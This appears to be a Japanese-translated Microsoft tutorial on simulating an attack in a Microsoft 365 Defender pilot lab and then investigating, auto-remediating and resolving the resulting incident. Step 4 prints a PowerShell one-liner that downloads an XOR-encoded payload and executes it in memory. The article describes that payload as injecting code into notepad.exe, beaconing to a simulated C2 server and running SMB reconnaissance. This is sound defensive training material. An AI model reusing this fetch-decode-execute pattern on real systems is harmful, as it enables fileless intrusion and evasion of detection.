Microsoft 365 Defenderパイロット環境で攻撃シミュレーションを実行する

この記事は、パイロット環境を使用してMicrosoft 365 Defenderでインシデントの調査と対応を実行するプロセスの手順 1/2 です。 このプロセスの詳細については、 概要 に関する記事を参照してください。

パイロット環境を準備したら、シミュレートされた攻撃でインシデントを作成し、Microsoft 365 Defender ポータルを使用して調査と対応を行うことで、Microsoft 365 Defenderのインシデント対応と自動調査と修復機能をテストします。

Microsoft 365 Defenderのインシデントは、攻撃のストーリーを構成する相関アラートと関連するデータのコレクションです。

Microsoft 365 サービスおよびアプリは、疑わしい、または悪意のあるイベントやアクティビティを検出した場合にアラートを作成します。 個々のアラートは、完了した攻撃、または進行中の攻撃に関する貴重な手がかりとなります。 ただし、攻撃は通常、デバイス、ユーザー、メールボックスなどの異なる種類のエンティティに対抗してさまざまな技術を採用しています。 その結果、テナント内の複数のエンティティに複数のアラートが表示されます。

注:

セキュリティ分析とインシデント対応を初めて使用する場合は、 最初のインシデントへの対応に関するチュートリアル を参照して、分析、修復、インシデント後のレビューの一般的なプロセスのガイド付きツアーを入手してください。

Microsoft 365 Defender ポータルで攻撃をシミュレートする

Microsoft 365 Defender ポータルには、パイロット環境に対してシミュレートされた攻撃を作成する機能が組み込まれています。

• でのOffice 365のMicrosoft 365 Defenderの攻撃シミュレーション トレーニングhttps://security.microsoft.com/attacksimulator。

  Microsoft 365 Defender ポータルで、[Emailコラボレーション > 攻撃シミュレーション トレーニング&] を選択します。

• でのエンドポイントhttps://security.microsoft.com/tutorials/simulationsのMicrosoft 365 Defenderに関する攻撃のチュートリアル & シミュレーション。

  Microsoft 365 Defender ポータルで、[エンドポイント>] [チュートリアル] シミュレーションを&選択します。

Defender for Office 365 攻撃シミュレーション トレーニング

Microsoft 365 E5またはMicrosoft Defender for Office 365プラン 2 を使用したDefender for Office 365には、フィッシング攻撃の攻撃シミュレーション トレーニングが含まれます。 基本的な手順は次のとおりです。

1. シミュレーションを作成する

   新しいシミュレーションを作成して起動する手順については、「 フィッシング攻撃をシミュレートする」を参照してください。

2. ペイロードを作成する

   シミュレーション内で使用するペイロードを作成する手順については、「 攻撃シミュレーション トレーニング用のカスタム ペイロードを作成する」を参照してください。

3. 分析情報の取得

   レポートを使用して分析情報を取得する手順については、「 攻撃シミュレーション トレーニングを通じて分析情報を得る」を参照してください。

詳細については、「 シミュレーション」を参照してください。

Defender for Endpoint 攻撃のチュートリアル シミュレーション&

Microsoft の Defender for Endpoint シミュレーションを次に示します。

• ドキュメントがバックドアにドロップする
• 自動調査 (バックドア)

サード パーティのソースからの追加のシミュレーションがあります。 チュートリアルのセットもあります。

シミュレーションまたはチュートリアルごとに、次の手順を実行します。

1. 提供されている対応するウォークスルー ドキュメントをダウンロードして読みます。

2. シミュレーション ファイルをダウンロードします。 ファイルまたはスクリプトをテスト デバイスにダウンロードすることもできますが、必須ではありません。

3. チュートリアル ドキュメントの指示に従って、テスト デバイスでシミュレーション ファイルまたはスクリプトを実行します。

詳細については、「シミュレートされた攻撃によるエクスペリエンス Microsoft Defender for Endpoint」を参照してください。

分離されたドメイン コントローラーとクライアント デバイスを使用して攻撃をシミュレートする (省略可能)

このオプションのインシデント対応演習では、PowerShell スクリプトを使用して分離されたActive Directory Domain Services (AD DS) ドメイン コントローラーと Windows デバイスに対する攻撃をシミュレートし、インシデントを調査、修復、解決します。

まず、パイロット環境にエンドポイントを追加する必要があります。

パイロット環境エンドポイントを追加する

まず、分離された AD DS ドメイン コントローラーと Windows デバイスをパイロット環境に追加する必要があります。

1. パイロット環境テナントでMicrosoft 365 Defenderが有効になっていることを確認します。

2. ドメイン コントローラーが次のことを確認します。

   • Windows Server 2008 R2 以降のバージョンを実行します。
   • Microsoft Defender for Identityにレポートし、リモート管理を有効にしています。
   • Microsoft Defender for IdentityとMicrosoft Defender for Cloud Apps統合が有効になっています。
   • テスト ユーザーがテスト ドメインに作成されている。 管理者レベルのアクセス許可は必要ありません。

3. テスト デバイスが次のことを確認します。

   • バージョン 1903 以降Windows 10実行します。
   • AD DS ドメイン コントローラー ドメインに参加しています。
   • Microsoft Defenderウイルス対策が有効になっています。 ウイルス対策Microsoft Defender有効にできない場合は、こちらのトラブルシューティング トピックを参照してください。
   • Microsoft Defender for Endpointにオンボードされます。

テナントとデバイス グループを使用する場合は、テスト デバイス用の専用デバイス グループを作成し、最上位にプッシュします。

もう 1 つの方法は、AD DS ドメイン コントローラーをホストし、Microsoft Azure インフラストラクチャ サービスで仮想マシンとしてデバイスをテストすることです。 シミュレートされたエンタープライズ テスト ラボ ガイドのフェーズ 1 の手順を使用できますが、APP1 仮想マシンの作成はスキップします。

結果を次に示します。

高度な手法を利用して検出から隠す高度な攻撃をシミュレートします。 この攻撃により、ドメイン コントローラーで開いているサーバー メッセージ ブロック (SMB) セッションが列挙され、ユーザーのデバイスの最近の IP アドレスが取得されます。 通常、このカテゴリの攻撃には、被害者のデバイスにドロップされたファイルは含まれていないため、メモリ内でのみ発生します。 既存のシステムと管理ツールを使用して "土地から離れて生きる" と、コードをシステム プロセスに挿入して実行を非表示にします。 このような動作により、検出を回避し、デバイスに保持できます。

このシミュレーションでは、サンプル シナリオは PowerShell スクリプトから始まります。 実際には、ユーザーがスクリプトを実行するようにだまされたり、以前に感染したデバイスから別のコンピューターへのリモート接続からスクリプトが実行されたりする可能性があります。これは、攻撃者がネットワーク内を横方向に移動しようとしていることを示します。 管理者は、さまざまな管理アクティビティを実行するためにリモートでスクリプトを実行することも多いため、これらのスクリプトの検出は困難な場合があります。

シミュレーション中に、攻撃によってシェルコードが一見無実のプロセスに挿入されます。 このシナリオでは、notepad.exeを使用する必要があります。 このプロセスをシミュレーション用に選択しましたが、攻撃者は実行時間の長いシステム プロセス (svchost.exe など) をターゲットにする可能性が高くなります。 その後、シェルコードは攻撃者のコマンド アンド コントロール (C2) サーバーに問い合わせて、続行方法の指示を受け取ります。 スクリプトは、ドメイン コントローラー (DC) に対して偵察クエリの実行を試みます。 偵察により、攻撃者は最近のユーザー ログイン情報に関する情報を取得できます。 攻撃者がこの情報を取得したら、ネットワーク内を横方向に移動して特定の機密性の高いアカウントに移動できます

重要

最適な結果を得るには、できるだけ攻撃シミュレーションの指示に従ってください。

分離された AD DS ドメイン コントローラー攻撃シミュレーションを実行する

攻撃シナリオシミュレーションを実行するには:

1. パイロット環境に、分離された AD DS ドメイン コントローラーと Windows デバイスが含まれていることを確認します。

2. テスト ユーザー アカウントを使用してテスト デバイスにサインインします。

3. テスト デバイスでWindows PowerShell ウィンドウを開きます。

4. 次のシミュレーション スクリプトをコピーします。

   [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$xor
   = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection');$base64String = (Invoke-WebRequest -URI "https://winatpmanagement.windows.com/client/management/static/MTP_Fileless_Recon.txt"
   -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0;
   $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i];
   $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
   

   注:

   Web ブラウザーでこの記事を開くと、特定の文字を失ったり改行を追加したりせずにフルテキストをコピーする際に問題が発生する可能性があります。 この場合は、このドキュメントをダウンロードし、Adobe Reader で開きます。

5. コピーしたスクリプトを PowerShell ウィンドウに貼り付けて実行します。

注:

リモート デスクトップ プロトコル (RDP) を使用して PowerShell を実行している場合は、 CTRL-V ホットキーまたは右クリック貼り付け方法が機能しない可能性があるため、RDP クライアントで [クリップボードテキストの入力] コマンドを使用します。 PowerShell の最近のバージョンでは、そのメソッドも受け入れられない場合があります。最初にメモリ内のメモ帳にコピーし、仮想マシンでコピーしてから PowerShell に貼り付ける必要があります。

数秒後、メモ帳アプリが開きます。 シミュレートされた攻撃コードがメモ帳に挿入されます。 完全なシナリオを体験するには、自動的に生成されたメモ帳インスタンスを開いたままにします。

シミュレートされた攻撃コードは、外部 IP アドレスへの通信 (C2 サーバーのシミュレート) を試み、SMB を介してドメイン コントローラーに対する偵察を試みます。

このスクリプトが完了すると、PowerShell コンソールに次のメッセージが表示されます。

ran NetSessionEnum against [DC Name] with return code result 0

自動インシデントと応答機能の動作を確認するには、notepad.exe プロセスを開いたままにします。 自動インシデントと応答によってメモ帳プロセスが停止する方法が表示されます。

シミュレートされた攻撃のインシデントを調査する

注:

このシミュレーションについて説明する前に、次のビデオを見て、インシデント管理を使用して、関連するアラートを調査プロセスの一部としてまとめる方法、ポータルで検出できる場所、およびセキュリティ運用にどのように役立つかを確認してください。

SOC アナリストの観点に切り替えると、Microsoft 365 Defender ポータルで攻撃の調査を開始できるようになりました。

1. Microsoft 365 Defender ポータルを開きます。

2. ナビゲーション ウィンドウで、[ インシデント & アラート > インシデント] を選択します。

3. シミュレートされた攻撃の新しいインシデントがインシデント キューに表示されます。

   

1 つのインシデントとして攻撃を調査する

Microsoft 365 Defender分析を関連付け、関連するすべてのアラートと調査を異なる製品から 1 つのインシデント エンティティに集計します。 そうすることで、Microsoft 365 Defenderはより広範な攻撃ストーリーを示し、SOC アナリストは複雑な脅威を理解して対応できます。

このシミュレーション中に生成されたアラートは同じ脅威に関連付けられます。その結果、1 つのインシデントとして自動的に集計されます。

インシデントを表示するには:

1. Microsoft 365 Defender ポータルを開きます。

2. ナビゲーション ウィンドウで、[ インシデント & アラート > インシデント] を選択します。

3. インシデント名の左側にある円をクリックして、最新の項目を選択します。 サイド パネルには、関連するすべてのアラートなど、インシデントに関する追加情報が表示されます。 各インシデントには、含まれるアラートの属性に基づいて説明する一意の名前があります。

   ダッシュボードに表示されるアラートは、サービス リソース (Microsoft Defender for Identity、Microsoft Defender for Cloud Apps、Microsoft Defender for Endpoint、Microsoft 365 Defender、およびMicrosoft Defender for Office 365。

4. [ インシデント ページを開く] を選択して、インシデントの詳細を取得します。

   [ インシデント ] ページでは、インシデントに関連するすべてのアラートと情報を確認できます。 この情報には、アラートに関連するエンティティと資産、アラートの検出ソース (Microsoft Defender for IdentityやMicrosoft Defender for Endpointなど)、およびそれらがリンクされた理由が含まれます。 インシデント アラートの一覧を確認すると、攻撃の進行状況が表示されます。 このビューでは、個々のアラートを確認して調査できます。

   右側のメニューで [ インシデントの管理 ] をクリックして、インシデントにタグを付け、自分に割り当て、コメントを追加することもできます。

生成されたアラートを確認する

シミュレートされた攻撃中に生成されたアラートの一部を見てみましょう。

注:

シミュレートされた攻撃中に生成されたアラートのほんの一部について説明します。 テスト デバイスで実行されている Windows のバージョンとMicrosoft 365 Defender製品によっては、少し異なる順序で表示されるアラートが増える場合があります。

アラート: 疑わしいプロセスの挿入が観察されました (ソース: Microsoft Defender for Endpoint)

高度な攻撃者は、高度で隠密な方法を使用してメモリに保持し、検出ツールから非表示にします。 一般的な手法の 1 つは、悪意のある実行可能ファイルではなく、信頼されたシステム プロセス内から操作し、検出ツールとセキュリティ操作で悪意のあるコードを見つけにくくすることです。

SOC アナリストがこれらの高度な攻撃をキャッチできるようにするために、Microsoft Defender for Endpointのディープ メモリ センサーは、さまざまなクロスプロセス コード インジェクション手法に対するこれまでにない可視性をクラウド サービスに提供します。 次の図は、 notepad.exeへのコード の挿入試行で Defender for Endpoint がどのように検出され、警告されるかを示しています。

アラート: コマンド ライン引数を指定せずに実行されたプロセスによって観察される予期しない動作 (ソース: Microsoft Defender for Endpoint)

Microsoft Defender for Endpoint検出は、多くの場合、攻撃手法の最も一般的な属性を対象とします。 この方法により、持続性が確保され、攻撃者が新しい戦術に切り替えるバーが発生します。

大規模な学習アルゴリズムを使用して、組織内および世界中の一般的なプロセスの通常の動作を確立し、これらのプロセスが異常な動作を示すタイミングを監視します。 これらの異常な動作は、多くの場合、不要なコードが導入され、それ以外の場合は信頼できるプロセスで実行されていることを示します。

このシナリオでは、 notepad.exe プロセスは、外部の場所との通信を伴う異常な動作を示しています。 この結果は、悪意のあるコードの導入と実行に使用される特定の方法とは無関係です。

注:

このアラートは、追加のバックエンド処理を必要とする機械学習モデルに基づいているため、このアラートがポータルに表示されるまでに時間がかかる場合があります。

アラートの詳細には、外部 IP アドレス (ピボットとして使用して調査を拡大できるインジケーター) が含まれています。

アラート プロセス ツリーで IP アドレスを選択して、IP アドレスの詳細ページを表示します。

次の図は、選択した IP アドレスの詳細ページを表示します (アラート プロセス ツリーで [IP アドレス] をクリック)。

アラート: ユーザーと IP アドレス偵察 (SMB) (ソース: Microsoft Defender for Identity)

サーバー メッセージ ブロック (SMB) プロトコルを使用した列挙により、攻撃者は、特定の機密性の高いアカウントにアクセスするためにネットワーク内を横方向に移動するのに役立つ最近のユーザー ログオン情報を取得できます。

この検出では、SMB セッション列挙がドメイン コントローラーに対して実行されたときにアラートがトリガーされます。

Microsoft Defender for Endpointを使用してデバイスのタイムラインを確認する

このインシデントのさまざまなアラートを調べた後、前に調査したインシデント ページに戻ります。 [インシデント] ページの [デバイス] タブを選択して、Microsoft Defender for EndpointおよびMicrosoft Defender for Identityによって報告された、このインシデントに関連するデバイスを確認します。

攻撃が行われたデバイスの名前を選択して、その特定のデバイスのエンティティ ページを開きます。 そのページでは、トリガーされたアラートと関連イベントを確認できます。

[ タイムライン ] タブを選択してデバイス タイムラインを開き、デバイスで観察されたすべてのイベントと動作を時系列で表示します。アラートが発生した状態で散在します。

より興味深い動作の一部を拡張すると、プロセス ツリーなどの便利な詳細が提供されます。

たとえば、アラート イベントが検出されるまで下にスクロール し、疑わしいプロセスの挿入が観察されます。 その下の プロセス イベントnotepad.exe挿入されたpowershell.exe を選択して、サイド ウィンドウの [イベント エンティティ ] グラフの下に、この動作の完全なプロセス ツリーを表示します。 必要に応じて、検索バーを使用してフィルター処理を行います。

Microsoft Defender for Cloud Appsを使用してユーザー情報を確認する

インシデント ページで、[ ユーザー ] タブを選択して、攻撃に関与したユーザーの一覧を表示します。 テーブルには、各ユーザーの 調査優先度 スコアなど、各ユーザーに関する追加情報が含まれています。

ユーザー名を選択して、詳細な調査を行うことができるユーザーのプロファイル ページを開きます。 リスクの高いユーザーの調査について詳しくは、こちらをご覧ください。

調査と修復の自動化

注:

このシミュレーションについて説明する前に、次のビデオを見て、自動自己修復とは何か、ポータルでどこで見つけるか、セキュリティ操作にどのように役立つかを理解してください。

Microsoft 365 Defender ポータルでインシデントに戻ります。 [インシデント] ページの [調査] タブには、Microsoft Defender for IdentityとMicrosoft Defender for Endpointによってトリガーされた自動調査が表示されます。 次のスクリーンショットは、Defender for Endpoint によってトリガーされた自動調査のみを示しています。 既定では、Defender for Endpoint は、キューで見つかった成果物を自動的に修復します。これには修復が必要です。

調査をトリガーしたアラートを選択して、[調査の 詳細 ] ページを開きます。 次の詳細が表示されます。

• 自動調査をトリガーしたアラート。
• 影響を受けたユーザーとデバイス。 インジケーターが追加のデバイスで見つかった場合は、これらの追加のデバイスも一覧表示されます。
• 証拠の一覧。 ファイル、プロセス、サービス、ドライバー、ネットワーク アドレスなど、検出および分析されたエンティティ。 これらのエンティティは、アラートとの関係の可能性について分析され、無害または悪意があると評価されます。
• 脅威が見つかりました。 調査中に検出された既知の脅威。

注:

タイミングによっては、自動調査がまだ実行されている可能性があります。 証拠を収集して分析し、結果を確認する前に、プロセスが完了するまで数分待ちます。 最新の結果を取得するには、[ 調査の詳細 ] ページを更新します。

自動調査中に、Microsoft Defender for Endpointは、修復を必要とする成果物の 1 つとして挿入されたnotepad.exe プロセスを特定しました。 Defender for Endpoint は、自動修復の一部として疑わしいプロセスの挿入を自動的に停止します。

テスト デバイス notepad.exe 実行中のプロセスの一覧から消えるのを確認できます。

インシデントを解決する

調査が完了し、修復が確認されたら、インシデントを解決します。

[ インシデント ] ページで、[ インシデントの管理] を選択します。 状態を [インシデントの解決 ] に設定し、分類の 場合は True アラート を選択し、判定の セキュリティ テスト を選択します。

インシデントが解決されると、Microsoft 365 Defender ポータルと関連ポータルで関連付けられているすべてのアラートが解決されます。

これにより、インシデント分析、自動調査、インシデント解決のための攻撃シミュレーションがまとめられます。

次の手順

手順 2/2: インシデント対応機能Microsoft 365 Defender試す

必要なナビゲーション

Microsoft 365 Defender評価環境を作成する